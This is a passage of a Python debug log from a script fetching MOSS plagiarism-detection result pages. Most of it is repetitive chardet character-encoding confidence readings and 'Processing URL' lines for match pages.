0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5472879106751923\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match201-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match201-0.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match201-1.html\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match197-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match197-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match197-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match200-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match200-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match200-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5352566126887538\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19424\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19088\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19411\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31463\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19424\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19075\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19411\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19088\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40420\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31450\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19075\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19411\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31463\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19075\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40407\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19076\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19412\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31450\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19075\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40420\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19411\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31450\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40407\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31451\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.529580569845873\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40407\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31450\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40408\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5280202689114556\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40407\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5588585707638614\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match207-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match203-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match209-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21276\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21289\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 20102\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 20089\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21277\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5667740239305642\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 20102\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21276\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 20089\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 20089\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 20090\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356196010713635\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 20089\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5516082579026649\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match205-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match208-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match204-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16159\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match206-1.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16172\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19390\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16159\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16160\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19377\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16159\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19390\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19377\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5391977486644284\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210-top.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19377\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19378\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19377\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17082\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17069\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17082\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.537539049067621\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17069\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match210-1.html\nDEBUG:root:Processing URL: 